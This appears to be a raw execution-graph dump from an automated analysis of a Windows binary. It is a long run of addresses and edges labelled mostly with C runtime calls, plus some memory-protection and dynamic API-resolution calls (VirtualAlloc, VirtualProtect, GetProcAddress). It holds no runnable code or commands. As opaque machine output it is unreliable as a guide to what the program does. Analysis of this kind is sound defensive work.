                                                          execution_graph 8811 2d6f1515ce9 8812 2d6f1515cf0 VirtualProtect 8811->8812 8813 2d6f1515d19 GetLastError 8812->8813 8814 2d6f1515c00 8812->8814 8813->8814 8815 2d6f1513ee9 8816 2d6f1513e36 _invalid_parameter_noinfo 8815->8816 8817 2d6f1513e86 VirtualQuery 8816->8817 8818 2d6f1513eba VirtualAlloc 8816->8818 8820 2d6f1513ea0 8816->8820 8817->8816 8817->8820 8819 2d6f1513eeb GetLastError 8818->8819 8818->8820 8819->8816 8819->8820 7680 2d6f1520f70 7681 2d6f1520f9d 7680->7681 7687 2d6f1520fb2 7681->7687 7688 2d6f151dadc 7681->7688 7694 2d6f1517d70 7687->7694 7703 2d6f151d3d0 GetLastError 7688->7703 7690 2d6f151dae5 7691 2d6f151d9a0 7690->7691 7761 2d6f151d838 7691->7761 7695 2d6f1517d79 7694->7695 7696 2d6f151855c IsProcessorFeaturePresent 7695->7696 7697 2d6f1517d84 7695->7697 7698 2d6f1518574 7696->7698 7884 2d6f1518750 RtlCaptureContext 7698->7884 7704 2d6f151d411 FlsSetValue 7703->7704 7705 2d6f151d3f4 7703->7705 7706 2d6f151d423 7704->7706 7717 2d6f151d401 SetLastError 7704->7717 7705->7704 7705->7717 7720 2d6f151dafc 7706->7720 7710 2d6f151d450 FlsSetValue 7713 2d6f151d45c FlsSetValue 7710->7713 7714 2d6f151d46e 7710->7714 7711 2d6f151d440 FlsSetValue 7712 2d6f151d449 7711->7712 7727 2d6f151db74 7712->7727 7713->7712 7733 2d6f151cfc4 7714->7733 7717->7690 7721 2d6f151db0d __free_lconv_mon 7720->7721 7722 2d6f151db5e 7721->7722 7723 2d6f151db42 HeapAlloc 7721->7723 7738 2d6f151bc8c 7721->7738 7725 2d6f151dadc __free_lconv_mon 10 API calls 7722->7725 7723->7721 7724 2d6f151d432 7723->7724 7724->7710 7724->7711 7725->7724 7728 2d6f151db79 HeapFree 7727->7728 7729 2d6f151dbaa 7727->7729 7728->7729 7730 2d6f151db94 GetLastError 7728->7730 7729->7717 7731 2d6f151dba1 __free_lconv_mon 7730->7731 7732 2d6f151dadc __free_lconv_mon 9 API calls 7731->7732 7732->7729 7747 2d6f151ce9c 7733->7747 7741 2d6f151bccc 7738->7741 7746 2d6f151cdcc EnterCriticalSection 7741->7746 7759 2d6f151cdcc EnterCriticalSection 7747->7759 7762 2d6f151d863 7761->7762 7769 2d6f151d8d4 7762->7769 7765 2d6f151d8ad 7766 2d6f151d8c2 7765->7766 7768 2d6f151cbd0 _invalid_parameter_noinfo 28 API calls 7765->7768 7766->7687 7768->7766 7792 2d6f151d61c 7769->7792 7773 2d6f151d88a 7773->7765 7779 2d6f151cbd0 7773->7779 7780 2d6f151cc28 7779->7780 7781 2d6f151cbdf GetLastError 7779->7781 7780->7765 7782 2d6f151cbf4 7781->7782 7783 2d6f151d498 _invalid_parameter_noinfo 14 API calls 7782->7783 7784 2d6f151cc0e SetLastError 7783->7784 7784->7780 7785 2d6f151cc31 7784->7785 7786 2d6f151cbd0 _invalid_parameter_noinfo 26 API calls 7785->7786 7787 2d6f151cc57 7786->7787 7827 2d6f1520860 7787->7827 7793 2d6f151d638 GetLastError 7792->7793 7794 2d6f151d673 7792->7794 7795 2d6f151d648 7793->7795 7794->7773 7798 2d6f151d688 7794->7798 7805 2d6f151d498 7795->7805 7799 2d6f151d6bc 7798->7799 7800 2d6f151d6a4 GetLastError SetLastError 7798->7800 7799->7773 7801 2d6f151d9c0 IsProcessorFeaturePresent 7799->7801 7800->7799 7802 2d6f151d9d3 7801->7802 7819 2d6f151d6d4 7802->7819 7806 2d6f151d4b7 FlsGetValue 7805->7806 7807 2d6f151d4cc 7805->7807 7806->7807 7808 2d6f151d4c4 SetLastError 7806->7808 7807->7808 7809 2d6f151dafc __free_lconv_mon 11 API calls 7807->7809 7808->7794 7810 2d6f151d4ee 7809->7810 7811 2d6f151d50c FlsSetValue 7810->7811 7814 2d6f151d4fc 7810->7814 7812 2d6f151d518 FlsSetValue 7811->7812 7813 2d6f151d52a 7811->7813 7812->7814 7815 2d6f151cfc4 __free_lconv_mon 11 API calls 7813->7815 7816 2d6f151db74 __free_lconv_mon 11 API calls 7814->7816 7817 2d6f151d532 7815->7817 7816->7808 7818 2d6f151db74 __free_lconv_mon 11 API calls 7817->7818 7818->7808 7820 2d6f151d70e _invalid_parameter_noinfo 7819->7820 7821 2d6f151d736 RtlCaptureContext RtlLookupFunctionEntry 7820->7821 7822 2d6f151d7a6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7821->7822 7823 2d6f151d770 RtlVirtualUnwind 7821->7823 7824 2d6f151d7f8 _invalid_parameter_noinfo 7822->7824 7823->7822 7825 2d6f1517d70 _log10_special 8 API calls 7824->7825 7826 2d6f151d817 GetCurrentProcess TerminateProcess 7825->7826 7828 2d6f1520879 7827->7828 7830 2d6f151cc7f 7827->7830 7828->7830 7835 2d6f1520e8c 7828->7835 7831 2d6f15208cc 7830->7831 7832 2d6f151cc8f 7831->7832 7833 2d6f15208e5 7831->7833 7832->7765 7833->7832 7881 2d6f151f120 7833->7881 7844 2d6f151d258 GetLastError 7835->7844 7837 2d6f1520e9b 7843 2d6f1520ee1 7837->7843 7880 2d6f151cdcc EnterCriticalSection 7837->7880 7843->7830 7845 2d6f151d299 FlsSetValue 7844->7845 7846 2d6f151d27c FlsGetValue 7844->7846 7848 2d6f151d2ab 7845->7848 7861 2d6f151d289 7845->7861 7847 2d6f151d293 7846->7847 7846->7861 7847->7845 7850 2d6f151dafc __free_lconv_mon 11 API calls 7848->7850 7849 2d6f151d305 SetLastError 7851 2d6f151d312 7849->7851 7860 2d6f151d325 7849->7860 7852 2d6f151d2ba 7850->7852 7851->7837 7853 2d6f151d2d8 FlsSetValue 7852->7853 7854 2d6f151d2c8 FlsSetValue 7852->7854 7856 2d6f151d2f6 7853->7856 7857 2d6f151d2e4 FlsSetValue 7853->7857 7855 2d6f151d2d1 7854->7855 7858 2d6f151db74 __free_lconv_mon 11 API calls 7855->7858 7859 2d6f151cfc4 __free_lconv_mon 11 API calls 7856->7859 7857->7855 7858->7861 7862 2d6f151d2fe 7859->7862 7863 2d6f151d358 FlsSetValue 7860->7863 7864 2d6f151d33d FlsGetValue 7860->7864 7861->7849 7865 2d6f151db74 __free_lconv_mon 11 API calls 7862->7865 7867 2d6f151d365 7863->7867 7869 2d6f151d34a 7863->7869 7866 2d6f151d352 7864->7866 7864->7869 7865->7849 7866->7863 7868 2d6f151dafc __free_lconv_mon 11 API calls 7867->7868 7870 2d6f151d374 7868->7870 7869->7837 7871 2d6f151d392 FlsSetValue 7870->7871 7872 2d6f151d382 FlsSetValue 7870->7872 7874 2d6f151d3b0 7871->7874 7875 2d6f151d39e FlsSetValue 7871->7875 7873 2d6f151d38b 7872->7873 7876 2d6f151db74 __free_lconv_mon 11 API calls 7873->7876 7877 2d6f151cfc4 __free_lconv_mon 11 API calls 7874->7877 7875->7873 7876->7869 7878 2d6f151d3b8 7877->7878 7878->7869 7879 2d6f151db74 __free_lconv_mon 11 API calls 7878->7879 7879->7869 7882 2d6f151d258 _invalid_parameter_noinfo 23 API calls 7881->7882 7883 2d6f151f129 7882->7883 7885 2d6f151876a RtlLookupFunctionEntry 7884->7885 7886 2d6f1518587 7885->7886 7887 2d6f1518780 RtlVirtualUnwind 7885->7887 7888 2d6f1518528 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7886->7888 7887->7885 7887->7886 8515 2d6f1520070 8516 2d6f15200a0 8515->8516 8519 2d6f15200c7 8515->8519 8517 2d6f151d3d0 __free_lconv_mon 11 API calls 8516->8517 8516->8519 8521 2d6f15200b4 8516->8521 8517->8521 8518 2d6f152019c 8522 2d6f15202d0 8518->8522 8527 2d6f15201ca 8518->8527 8535 2d6f1520203 8518->8535 8519->8518 8538 2d6f151cdcc EnterCriticalSection 8519->8538 8521->8519 8523 2d6f1520149 8521->8523 8532 2d6f1520104 8521->8532 8528 2d6f15202dd 8522->8528 8540 2d6f151ce20 LeaveCriticalSection 8522->8540 8525 2d6f151dadc __free_lconv_mon 11 API calls 8523->8525 8529 2d6f152014e 8525->8529 8530 2d6f151d258 _invalid_parameter_noinfo 23 API calls 8527->8530 8527->8535 8531 2d6f151d9a0 _invalid_parameter_noinfo 49 API calls 8529->8531 8533 2d6f15201f3 8530->8533 8531->8532 8534 2d6f151d258 _invalid_parameter_noinfo 23 API calls 8533->8534 8534->8535 8536 2d6f1520261 8535->8536 8539 2d6f151ce20 LeaveCriticalSection 8535->8539 8537 2d6f151d258 23 API calls _invalid_parameter_noinfo 8536->8537 8537->8536 8541 2d6f1521470 8542 2d6f152148f 8541->8542 8543 2d6f1521508 8542->8543 8546 2d6f152149f 8542->8546 8549 2d6f1518630 8543->8549 8547 2d6f1517d70 _log10_special 8 API calls 8546->8547 8548 2d6f15214fe 8547->8548 8552 2d6f1518644 IsProcessorFeaturePresent 8549->8552 8553 2d6f151865b 8552->8553 8558 2d6f15186e0 RtlCaptureContext RtlLookupFunctionEntry 8553->8558 8559 2d6f1518710 RtlVirtualUnwind 8558->8559 8560 2d6f151866f 8558->8560 8559->8560 8561 2d6f1518528 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8560->8561 8115 2d6f1512bf4 8116 2d6f1512c65 8115->8116 8117 2d6f1512f88 8116->8117 8118 2d6f1512c91 GetModuleHandleA 8116->8118 8119 2d6f1512ca3 GetProcAddress 8118->8119 8120 2d6f1512cb5 8118->8120 8119->8120 8120->8117 8121 2d6f1512cdc StrCmpNIW 8120->8121 8121->8117 8125 2d6f1512d01 8121->8125 8122 2d6f1511934 6 API calls 8122->8125 8123 2d6f1512e13 lstrlenW 8123->8125 8124 2d6f1512ebd lstrlenW 8124->8125 8125->8117 8125->8122 8125->8123 8125->8124 8126 2d6f1511c00 StrCmpIW StrCmpW 8125->8126 8127 2d6f1513c74 StrCmpNIW 8125->8127 8126->8125 8127->8125 7889 2d6f151d558 7890 2d6f151d568 7889->7890 7891 2d6f151d3d0 __free_lconv_mon 11 API calls 7890->7891 7892 2d6f151d573 __vcrt_uninitialize_ptd 7890->7892 7891->7892 8821 2d6f15218d8 8822 2d6f15218e0 8821->8822 8823 2d6f15218f5 8822->8823 8824 2d6f152190e 8822->8824 8825 2d6f151dadc __free_lconv_mon 11 API calls 8823->8825 8829 2d6f1521905 8824->8829 8830 2d6f151e5e4 8824->8830 8826 2d6f15218fa 8825->8826 8828 2d6f151d9a0 _invalid_parameter_noinfo 49 API calls 8826->8828 8828->8829 8831 2d6f151e608 8830->8831 8832 2d6f151e603 8830->8832 8831->8832 8833 2d6f151d258 _invalid_parameter_noinfo 23 API calls 8831->8833 8832->8829 8834 2d6f151e623 8833->8834 8838 2d6f152082c 8834->8838 8839 2d6f151e646 8838->8839 8840 2d6f1520841 8838->8840 8842 2d6f1520898 8839->8842 8840->8839 8841 2d6f1520e8c _invalid_parameter_noinfo 23 API calls 8840->8841 8841->8839 8843 2d6f15208ad 8842->8843 8844 2d6f15208c0 8842->8844 8843->8844 8845 2d6f151f120 _invalid_parameter_noinfo 23 API calls 8843->8845 8844->8832 8845->8844 8562 2d6f1512a58 8564 2d6f1512aac 8562->8564 8563 2d6f1512ac7 8564->8563 8566 2d6f15133f8 8564->8566 8567 2d6f151341d 8566->8567 8568 2d6f151348e 8566->8568 8567->8568 8569 2d6f1513c74 StrCmpNIW 8567->8569 8570 2d6f1511d0c StrCmpIW StrCmpW 8567->8570 8568->8563 8569->8567 8570->8567 8128 2d6f15239db 8129 2d6f1523a1b 8128->8129 8130 2d6f1523c80 8128->8130 8129->8130 8132 2d6f1523c62 8129->8132 8133 2d6f1523a4f 8129->8133 8131 2d6f1523c76 8130->8131 8135 2d6f1524790 _log10_special 20 API calls 8130->8135 8136 2d6f1524790 8132->8136 8135->8131 8139 2d6f15247b0 8136->8139 8140 2d6f15247ca 8139->8140 8141 2d6f15247ab 8140->8141 8143 2d6f15245f0 8140->8143 8141->8131 8144 2d6f1524630 _log10_special 8143->8144 8147 2d6f152469c _log10_special 8144->8147 8154 2d6f15248b0 8144->8154 8146 2d6f15246d9 8161 2d6f1524be0 8146->8161 8147->8146 8149 2d6f15246a9 8147->8149 8157 2d6f15244cc 8149->8157 8151 2d6f15246d7 _log10_special 8152 2d6f1517d70 _log10_special 8 API calls 8151->8152 8153 2d6f1524701 8152->8153 8153->8141 8167 2d6f15248d8 8154->8167 8158 2d6f1524510 _log10_special 8157->8158 8159 2d6f1524525 8158->8159 8160 2d6f1524be0 _log10_special 11 API calls 8158->8160 8159->8151 8160->8159 8162 2d6f1524c00 8161->8162 8164 2d6f1524be9 8161->8164 8163 2d6f151dadc __free_lconv_mon 11 API calls 8162->8163 8165 2d6f1524bf8 8163->8165 8164->8165 8166 2d6f151dadc __free_lconv_mon 11 API calls 8164->8166 8165->8151 8166->8165 8168 2d6f1524917 _raise_exc _clrfp 8167->8168 8169 2d6f1524b2c RaiseException 8168->8169 8170 2d6f15248d2 8169->8170 8170->8147 8846 2d6f1512adc 8848 2d6f1512b39 8846->8848 8847 2d6f1512b54 8848->8847 8849 2d6f15134ac 3 API calls 8848->8849 8849->8847 8571 2d6f151fc60 GetProcessHeap 8572 2d6f1517c60 8573 2d6f1517c7c 8572->8573 8574 2d6f1517c81 8572->8574 8576 2d6f1517d90 8573->8576 8577 2d6f1517e27 8576->8577 8578 2d6f1517db3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8576->8578 8577->8574 8578->8577 7893 2d6f151c964 7896 2d6f151c714 7893->7896 7903 2d6f151c6dc 7896->7903 7904 2d6f151c6ec 7903->7904 7905 2d6f151c6f1 7903->7905 7906 2d6f151c698 11 API calls 7904->7906 7907 2d6f151c6f8 7905->7907 7906->7905 7908 2d6f151c708 7907->7908 7909 2d6f151c70d 7907->7909 7910 2d6f151c698 11 API calls 7908->7910 7911 2d6f151c698 7909->7911 7910->7909 7913 2d6f151c69d 7911->7913 7916 2d6f151c6ce 7911->7916 7912 2d6f151c6c6 7915 2d6f151db74 __free_lconv_mon 11 API calls 7912->7915 7913->7912 7914 2d6f151db74 __free_lconv_mon 11 API calls 7913->7914 7914->7913 7915->7916 7917 2d6f1525165 7926 2d6f1519a64 7917->7926 7919 2d6f152517d 7920 2d6f1519a64 _CreateFrameInfo 9 API calls 7919->7920 7921 2d6f1525198 7920->7921 7922 2d6f1519a64 _CreateFrameInfo 9 API calls 7921->7922 7923 2d6f15251ac 7922->7923 7924 2d6f1519a64 _CreateFrameInfo 9 API calls 7923->7924 7925 2d6f15251ee 7924->7925 7929 2d6f1519a80 7926->7929 7928 2d6f1519a6d 7928->7919 7930 2d6f1519a98 7929->7930 7931 2d6f1519a9f GetLastError 7929->7931 7930->7928 7941 2d6f151a3d4 7931->7941 7945 2d6f151a1f4 7941->7945 7946 2d6f151a30e TlsGetValue 7945->7946 7951 2d6f151a238 __vcrt_FlsAlloc 7945->7951 7947 2d6f151a266 LoadLibraryExW 7949 2d6f151a287 GetLastError 7947->7949 7950 2d6f151a2dd 7947->7950 7948 2d6f151a2fd GetProcAddress 7948->7946 7949->7951 7950->7948 7952 2d6f151a2f4 FreeLibrary 7950->7952 7951->7946 7951->7947 7951->7948 7953 2d6f151a2a9 LoadLibraryExW 7951->7953 7952->7948 7953->7950 7953->7951 8171 2d6f15183e4 8172 2d6f1519818 __std_exception_copy 49 API calls 8171->8172 8173 2d6f151840d 8172->8173 8579 2d6f1515664 8580 2d6f151566a 8579->8580 8591 2d6f1517ca0 8580->8591 8584 2d6f15156ce 8585 2d6f1515767 _invalid_parameter_noinfo 8585->8584 8588 2d6f15158ed 8585->8588 8604 2d6f1517870 8585->8604 8587 2d6f15159eb 8588->8587 8589 2d6f1515a67 VirtualProtect 8588->8589 8589->8584 8590 2d6f1515a93 GetLastError 8589->8590 8590->8584 8592 2d6f1517cab 8591->8592 8593 2d6f15156ad 8592->8593 8594 2d6f151bc8c __free_lconv_mon 2 API calls 8592->8594 8595 2d6f1517cca 8592->8595 8593->8584 8600 2d6f15140f0 8593->8600 8594->8592 8598 2d6f1517cd5 8595->8598 8610 2d6f15184cc 8595->8610 8614 2d6f15184ec 8598->8614 8601 2d6f151410d 8600->8601 8603 2d6f151417c _invalid_parameter_noinfo 8601->8603 8618 2d6f1514360 8601->8618 8603->8585 8605 2d6f15178b7 8604->8605 8643 2d6f1517640 8605->8643 8608 2d6f1517d70 _log10_special 8 API calls 8609 2d6f15178e1 8608->8609 8609->8585 8611 2d6f15184da std::bad_alloc::bad_alloc 8610->8611 8612 2d6f15198d0 Concurrency::cancel_current_task 2 API calls 8611->8612 8613 2d6f15184eb 8612->8613 8615 2d6f15184fa std::bad_alloc::bad_alloc 8614->8615 8616 2d6f15198d0 Concurrency::cancel_current_task 2 API calls 8615->8616 8617 2d6f1517cdb 8616->8617 8619 2d6f15143a7 8618->8619 8620 2d6f1514384 8618->8620 8621 2d6f15143dd 8619->8621 8638 2d6f1513f40 8619->8638 8620->8619 8632 2d6f1513e10 8620->8632 8623 2d6f151440d 8621->8623 8625 2d6f1513f40 2 API calls 8621->8625 8626 2d6f1513e10 3 API calls 8623->8626 8630 2d6f1514443 8623->8630 8625->8623 8626->8630 8627 2d6f1513e10 3 API calls 8628 2d6f151445f 8627->8628 8629 2d6f151447b 8628->8629 8631 2d6f1513f40 2 API calls 8628->8631 8629->8603 8630->8627 8630->8628 8631->8629 8633 2d6f1513e31 _invalid_parameter_noinfo 8632->8633 8634 2d6f1513e86 VirtualQuery 8633->8634 8635 2d6f1513ea0 8633->8635 8636 2d6f1513eba VirtualAlloc 8633->8636 8634->8633 8634->8635 8635->8619 8636->8635 8637 2d6f1513eeb GetLastError 8636->8637 8637->8633 8637->8635 8641 2d6f1513f58 _invalid_parameter_noinfo 8638->8641 8639 2d6f1513fc7 8639->8621 8640 2d6f1513fad VirtualQuery 8640->8639 8640->8641 8641->8639 8641->8640 8642 2d6f1514012 GetLastError 8641->8642 8642->8639 8642->8641 8644 2d6f151765b 8643->8644 8645 2d6f1517671 SetLastError 8644->8645 8646 2d6f151767f 8644->8646 8645->8646 8646->8608 8647 2d6f1519664 8654 2d6f1519bac 8647->8654 8653 2d6f1519671 8655 2d6f1519bb4 8654->8655 8657 2d6f1519be5 8655->8657 8658 2d6f151966d 8655->8658 8671 2d6f151a470 8655->8671 8659 2d6f1519bf4 __vcrt_uninitialize_locks DeleteCriticalSection 8657->8659 8658->8653 8660 2d6f1519b40 8658->8660 8659->8658 8676 2d6f151a344 8660->8676 8672 2d6f151a1f4 __vcrt_FlsAlloc 5 API calls 8671->8672 8673 2d6f151a4a6 8672->8673 8674 2d6f151a4bb InitializeCriticalSectionAndSpinCount 8673->8674 8675 2d6f151a4b0 8673->8675 8674->8675 8675->8655 8677 2d6f151a1f4 __vcrt_FlsAlloc 5 API calls 8676->8677 8678 2d6f151a369 TlsAlloc 8677->8678 8174 2d6f1525208 8177 2d6f151b630 8174->8177 8178 2d6f151b64f 8177->8178 8180 2d6f151b6a0 8177->8180 8179 2d6f1519a64 _CreateFrameInfo 9 API calls 8178->8179 8178->8180 8179->8180 7954 2d6f1518386 7957 2d6f1519818 7954->7957 7956 2d6f15183b1 7958 2d6f151986e __vcrt_freefls 7957->7958 7959 2d6f1519839 7957->7959 7958->7956 7959->7958 7961 2d6f151cb18 7959->7961 7962 2d6f151cb2f 7961->7962 7963 2d6f151cb25 7961->7963 7964 2d6f151dadc __free_lconv_mon 11 API calls 7962->7964 7963->7962 7968 2d6f151cb4a 7963->7968 7965 2d6f151cb36 7964->7965 7966 2d6f151d9a0 _invalid_parameter_noinfo 49 API calls 7965->7966 7967 2d6f151cb42 7966->7967 7967->7958 7968->7967 7969 2d6f151dadc __free_lconv_mon 11 API calls 7968->7969 7969->7965 8850 2d6f1517f0c 8857 2d6f151968c 8850->8857 8853 2d6f1517f19 8858 2d6f1519a80 _CreateFrameInfo 9 API calls 8857->8858 8859 2d6f1517f15 8858->8859 8859->8853 8860 2d6f151ca6c 8859->8860 8861 2d6f151d3d0 __free_lconv_mon 11 API calls 8860->8861 8862 2d6f1517f22 8861->8862 8862->8853 8863 2d6f15196a0 8862->8863 8866 2d6f1519a1c 8863->8866 8865 2d6f15196a9 8865->8853 8867 2d6f1519a42 __vcrt_freefls 8866->8867 8868 2d6f1519a2d 8866->8868 8867->8865 8869 2d6f151a3d4 _CreateFrameInfo 6 API calls 8868->8869 8870 2d6f1519a32 8869->8870 8872 2d6f151a41c 8870->8872 8873 2d6f151a1f4 __vcrt_FlsAlloc 5 API calls 8872->8873 8874 2d6f151a44a 8873->8874 8875 2d6f151a45c TlsSetValue 8874->8875 8876 2d6f151a454 8874->8876 8875->8876 8876->8867 8181 2d6f1524e10 8182 2d6f1524e48 __GSHandlerCheckCommon 8181->8182 8183 2d6f1524e74 8182->8183 8185 2d6f151a16c 8182->8185 8186 2d6f1519a64 _CreateFrameInfo 9 API calls 8185->8186 8187 2d6f151a196 8186->8187 8188 2d6f1519a64 _CreateFrameInfo 9 API calls 8187->8188 8189 2d6f151a1a3 8188->8189 8190 2d6f1519a64 _CreateFrameInfo 9 API calls 8189->8190 8191 2d6f151a1ac 8190->8191 8191->8183 8680 2d6f1524e90 8690 2d6f1519418 8680->8690 8682 2d6f1524eb8 8684 2d6f1519a64 _CreateFrameInfo 9 API calls 8685 2d6f1524ec8 8684->8685 8686 2d6f1519a64 _CreateFrameInfo 9 API calls 8685->8686 8687 2d6f1524ed1 8686->8687 8688 2d6f151cad8 23 API calls 8687->8688 8689 2d6f1524eda 8688->8689 8693 2d6f1519448 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 8690->8693 8691 2d6f1519539 8691->8682 8691->8684 8692 2d6f1519504 RtlUnwindEx 8692->8693 8693->8691 8693->8692 8192 2d6f1514010 8195 2d6f1513f5d _invalid_parameter_noinfo 8192->8195 8193 2d6f1513fc7 8194 2d6f1513fad VirtualQuery 8194->8193 8194->8195 8195->8193 8195->8194 8196 2d6f1514012 GetLastError 8195->8196 8196->8193 8196->8195 8694 2d6f151d094 8695 2d6f151d099 8694->8695 8699 2d6f151d0ae 8694->8699 8700 2d6f151d0b4 8695->8700 8701 2d6f151d0f6 8700->8701 8702 2d6f151d0fe 8700->8702 8703 2d6f151db74 __free_lconv_mon 11 API calls 8701->8703 8704 2d6f151db74 __free_lconv_mon 11 API calls 8702->8704 8703->8702 8705 2d6f151d10b 8704->8705 8706 2d6f151db74 __free_lconv_mon 11 API calls 8705->8706 8707 2d6f151d118 8706->8707 8708 2d6f151db74 __free_lconv_mon 11 API calls 8707->8708 8709 2d6f151d125 8708->8709 8710 2d6f151db74 __free_lconv_mon 11 API calls 8709->8710 8711 2d6f151d132 8710->8711 8712 2d6f151db74 __free_lconv_mon 11 API calls 8711->8712 8713 2d6f151d13f 8712->8713 8714 2d6f151db74 __free_lconv_mon 11 API calls 8713->8714 8715 2d6f151d14c 8714->8715 8716 2d6f151db74 __free_lconv_mon 11 API calls 8715->8716 8717 2d6f151d159 8716->8717 8718 2d6f151db74 __free_lconv_mon 11 API calls 8717->8718 8719 2d6f151d169 8718->8719 8720 2d6f151db74 __free_lconv_mon 11 API calls 8719->8720 8721 2d6f151d179 8720->8721 8726 2d6f151cf64 8721->8726 8740 2d6f151cdcc EnterCriticalSection 8726->8740 8877 2d6f151c514 8878 2d6f151c529 8877->8878 8879 2d6f151c52d 8877->8879 8892 2d6f151f0c0 8879->8892 8884 2d6f151c54b 8918 2d6f151c588 8884->8918 8885 2d6f151c53f 8887 2d6f151db74 __free_lconv_mon 11 API calls 8885->8887 8887->8878 8889 2d6f151db74 __free_lconv_mon 11 API calls 8890 2d6f151c572 8889->8890 8891 2d6f151db74 __free_lconv_mon 11 API calls 8890->8891 8891->8878 8893 2d6f151c532 8892->8893 8894 2d6f151f0cd 8892->8894 8898 2d6f151f61c GetEnvironmentStringsW 8893->8898 8937 2d6f151d32c 8894->8937 8896 2d6f151f0fc 8954 2d6f151ed98 8896->8954 8899 2d6f151c537 8898->8899 8901 2d6f151f64c 8898->8901 8899->8884 8899->8885 8900 2d6f151f53c WideCharToMultiByte 8902 2d6f151f69d 8900->8902 8901->8900 8903 2d6f151f6a4 FreeEnvironmentStringsW 8902->8903 8904 2d6f151ce3c 12 API calls 8902->8904 8903->8899 8905 2d6f151f6b7 8904->8905 8906 2d6f151f6c8 8905->8906 8907 2d6f151f6bf 8905->8907 8909 2d6f151f53c WideCharToMultiByte 8906->8909 8908 2d6f151db74 __free_lconv_mon 11 API calls 8907->8908 8910 2d6f151f6c6 8908->8910 8911 2d6f151f6eb 8909->8911 8910->8903 8912 2d6f151f6f9 8911->8912 8913 2d6f151f6ef 8911->8913 8915 2d6f151db74 __free_lconv_mon 11 API calls 8912->8915 8914 2d6f151db74 __free_lconv_mon 11 API calls 8913->8914 8916 2d6f151f6f7 FreeEnvironmentStringsW 8914->8916 8915->8916 8916->8899 8919 2d6f151c5ad 8918->8919 8920 2d6f151dafc __free_lconv_mon 11 API calls 8919->8920 8921 2d6f151c5e3 8920->8921 8923 2d6f151c65e 8921->8923 8926 2d6f151dafc __free_lconv_mon 11 API calls 8921->8926 8927 2d6f151c64d 8921->8927 8929 2d6f151cb18 __std_exception_copy 49 API calls 8921->8929 8932 2d6f151c683 8921->8932 8933 2d6f151c5eb 8921->8933 8935 2d6f151db74 __free_lconv_mon 11 API calls 8921->8935 8922 2d6f151db74 __free_lconv_mon 11 API calls 8924 2d6f151c553 8922->8924 8925 2d6f151db74 __free_lconv_mon 11 API calls 8923->8925 8924->8889 8925->8924 8926->8921 8928 2d6f151c698 11 API calls 8927->8928 8930 2d6f151c655 8928->8930 8929->8921 8931 2d6f151db74 __free_lconv_mon 11 API calls 8930->8931 8931->8933 8934 2d6f151d9c0 _invalid_parameter_noinfo 17 API calls 8932->8934 8933->8922 8936 2d6f151c696 8934->8936 8935->8921 8938 2d6f151d358 FlsSetValue 8937->8938 8939 2d6f151d33d FlsGetValue 8937->8939 8941 2d6f151d365 8938->8941 8943 2d6f151d34a 8938->8943 8940 2d6f151d352 8939->8940 8939->8943 8940->8938 8942 2d6f151dafc __free_lconv_mon 11 API calls 8941->8942 8944 2d6f151d374 8942->8944 8943->8896 8945 2d6f151d392 FlsSetValue 8944->8945 8946 2d6f151d382 FlsSetValue 8944->8946 8948 2d6f151d3b0 8945->8948 8949 2d6f151d39e FlsSetValue 8945->8949 8947 2d6f151d38b 8946->8947 8950 2d6f151db74 __free_lconv_mon 11 API calls 8947->8950 8951 2d6f151cfc4 __free_lconv_mon 11 API calls 8948->8951 8949->8947 8950->8943 8952 2d6f151d3b8 8951->8952 8952->8943 8953 2d6f151db74 __free_lconv_mon 11 API calls 8952->8953 8953->8943 8977 2d6f151f008 8954->8977 8959 2d6f151edea 8959->8893 8960 2d6f151ce3c 12 API calls 8961 2d6f151edfb 8960->8961 8962 2d6f151ee03 8961->8962 8964 2d6f151ee12 8961->8964 8963 2d6f151db74 __free_lconv_mon 11 API calls 8962->8963 8963->8959 8964->8964 8996 2d6f151f13c 8964->8996 8967 2d6f151ef0e 8968 2d6f151dadc __free_lconv_mon 11 API calls 8967->8968 8970 2d6f151ef13 8968->8970 8969 2d6f151ef69 8972 2d6f151efd0 8969->8972 9007 2d6f151e8c8 8969->9007 8973 2d6f151db74 __free_lconv_mon 11 API calls 8970->8973 8971 2d6f151ef28 8971->8969 8974 2d6f151db74 __free_lconv_mon 11 API calls 8971->8974 8976 2d6f151db74 __free_lconv_mon 11 API calls 8972->8976 8973->8959 8974->8969 8976->8959 8978 2d6f151f02b 8977->8978 8984 2d6f151f035 8978->8984 9022 2d6f151cdcc EnterCriticalSection 8978->9022 8983 2d6f151edcd 8989 2d6f151ea98 8983->8989 8984->8983 8986 2d6f151d32c 16 API calls 8984->8986 8987 2d6f151f0fc 8986->8987 8988 2d6f151ed98 69 API calls 8987->8988 8988->8983 8990 2d6f151e5e4 23 API calls 8989->8990 8991 2d6f151eaac 8990->8991 8992 2d6f151eab8 GetOEMCP 8991->8992 8993 2d6f151eaca 8991->8993 8994 2d6f151eadf 8992->8994 8993->8994 8995 2d6f151eacf GetACP 8993->8995 8994->8959 8994->8960 8995->8994 8997 2d6f151ea98 25 API calls 8996->8997 8999 2d6f151f169 8997->8999 8998 2d6f151f2bf 9001 2d6f1517d70 _log10_special 8 API calls 8998->9001 8999->8998 9000 2d6f151f1c0 _invalid_parameter_noinfo 8999->9000 9002 2d6f151f1a6 IsValidCodePage 8999->9002 9023 2d6f151ebb0 9000->9023 9003 2d6f151ef05 9001->9003 9002->8998 9004 2d6f151f1b7 9002->9004 9003->8967 9003->8971 9004->9000 9005 2d6f151f1e6 GetCPInfo 9004->9005 9005->8998 9005->9000 9100 2d6f151cdcc EnterCriticalSection 9007->9100 9024 2d6f151ebed GetCPInfo 9023->9024 9025 2d6f151ece3 9023->9025 9024->9025 9030 2d6f151ec00 9024->9030 9026 2d6f1517d70 _log10_special 8 API calls 9025->9026 9027 2d6f151ed82 9026->9027 9027->8998 9034 2d6f1521974 9030->9034 9035 2d6f151e5e4 23 API calls 9034->9035 9036 2d6f15219b6 9035->9036 9054 2d6f151f4ac 9036->9054 9056 2d6f151f4b5 MultiByteToWideChar 9054->9056 7974 2d6f1525395 7975 2d6f15253a4 7974->7975 7977 2d6f15253ae 7974->7977 7978 2d6f151ce20 LeaveCriticalSection 7975->7978 8197 2d6f15123f8 8199 2d6f1512476 _invalid_parameter_noinfo 8197->8199 8198 2d6f15125b2 8199->8198 8200 2d6f15124db GetFileType 